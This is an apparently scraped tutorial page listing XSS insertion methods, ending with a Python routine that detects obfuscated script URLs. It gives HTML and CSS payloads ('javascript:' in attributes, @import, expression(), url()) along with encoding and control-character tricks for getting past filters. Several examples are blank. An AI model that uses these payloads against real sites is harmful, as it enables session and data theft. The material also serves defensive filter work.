XSS code trigger conditions, common methods for inserting XSS code

Source: Internet
Author: User

1. Script Insertion

(1) Insert JavaScript or VBScript as plain characters.

Example 1:

Example 2: <table background="Javascript:alert(/xss/)"></table> // inserting a script through a table attribute

Example 3:

(2) Convert the character encoding: convert any or all of the characters in "JavaScript" or "VBScript" to decimal or hexadecimal character references.

Example 1: // convert the character J to its decimal character reference.

Example 2: // convert the character J to its hexadecimal character reference.

(3) Insert obfuscation characters. Of the system control characters, all except the first, &#00 (NULL), and the last (DEL), that is, the other 31 characters, can be used as obfuscation characters and can be inserted at the head of JavaScript or VBScript; tab characters, line feeds, and carriage returns can also be inserted anywhere in the code.

Example 1: // inserted at the head of the code, which can be written as (to the same effect)

Example 2: // inserted anywhere in the code, which can be written as

Example 3: // the hexadecimal form of a carriage return

Example 4: // the hexadecimal form of a line feed

2. Style Sheets

(1) Use the CSS @import rule or expression() to trigger an XSS vulnerability.

Example 1: @import "HTTP://WEB/XSS.CSS"; // import an external CSS style sheet that carries the XSS code.

Example 2: @import 'Javascript:alert("XSS");' // invoke a JavaScript script to trigger the vulnerability

Example 3: body{xss:expression('XSS')} // add an expression event in an internal style sheet

Example 4:

(2) Add JavaScript or VBScript to CSS code.

Example 1: body{background-image:url(Javascript:alert("XSS"))}

Example 2: body{background-image:url(Vbscript:msgbox("XSS"))}

(3) Convert the character encoding, substituting CSS hexadecimal escapes for one or all of the characters:

Example 1: @\0069mport:url(WEB/1.CSS); // convert the i to \0069

Example 2: body{xss:\0065xpression(alert('XSS'))} // convert the e to \0065

Example 3: body{background-image:\0075\0072\006c ...} // convert "url" to hexadecimal escapes

(4) Insert obfuscation characters. In CSS, /**/ is a comment; besides /**/, the backslash "\" and the terminator "\0" are also ignored by the parser and can be used as obfuscation characters.

Example 1: @\0im\port '\0ja\vasc\ript:alert("XSS")';

Example 2:@\i\0m\00p\000o\0000\00000r\000000t "url";
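Every obfuscation above (numeric character references, inserted control characters, CSS hex escapes, stray backslashes, \0 and /**/) disappears once the value is canonicalized the way a lenient browser parses it, which is what a server-side filter has to do before checking for a script scheme. The following check is an added example, not code from the original page; the function names and the constructed sample values are assumptions of this example.

```python
import html
import re

# Control characters (NULL through US, plus DEL) that old, lenient browsers
# ignored inside an attribute value or URL scheme; the page singles out TAB, LF and CR.
_CONTROL = re.compile(r"[\x00-\x1f\x7f]")
# CSS /**/ comments and CSS hex escapes (1-6 hex digits, optional trailing whitespace).
_CSS_COMMENT = re.compile(r"/\*.*?\*/", re.S)
_CSS_HEX_ESCAPE = re.compile(r"\\([0-9a-fA-F]{1,6})[ \t\n]?")
# Schemes that execute code when used as a URL (the page's javascript:/vbscript: cases).
_SCRIPT_SCHEME = re.compile(r"^(javascript|vbscript):", re.I)


def canonicalize_html_value(value: str) -> str:
    """Reduce an HTML attribute value to what the browser acts on: decode
    &#106; / &#x6A; style character references (one pass, as the HTML parser
    does), then drop the control characters the page lists as obfuscation."""
    value = html.unescape(value)
    value = _CONTROL.sub("", value)
    return value.strip()


def _hex_escape(m: re.Match) -> str:
    cp = int(m.group(1), 16)
    return chr(cp) if cp <= 0x10FFFF else "\ufffd"   # out-of-range escape -> U+FFFD


def canonicalize_css_value(value: str) -> str:
    """Reduce a CSS value to what the style parser acts on: remove /**/ comments,
    resolve \\0069-style hex escapes, drop stray backslashes ("\\v" -> "v") and
    the control characters (including the NULL that \\0 decodes to) that are skipped."""
    value = _CSS_COMMENT.sub("", value)
    value = _CSS_HEX_ESCAPE.sub(_hex_escape, value)
    value = value.replace("\\", "")
    value = _CONTROL.sub("", value)
    return value.strip()


def is_script_url(value: str, context: str = "html") -> bool:
    """True if the value, after canonicalization, starts with a script scheme."""
    canon = canonicalize_css_value(value) if context == "css" else canonicalize_html_value(value)
    return _SCRIPT_SCHEME.match(canon) is not None


if __name__ == "__main__":
    # Constructed samples mirroring the page's obfuscations.
    for value, ctx in [("&#106;avascript:alert(1)", "html"),   # decimal reference for "j"
                       ("jav&#x09;ascript:alert(1)", "html"),  # TAB inside the scheme
                       ("\\0ja\\vasc\\ript:alert(1)", "css"),  # \0 terminator + backslashes
                       ("https://example.com/x.png", "html")]:
        print(f"{ctx:4} {value!r:40} -> {is_script_url(value, ctx)}")
```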
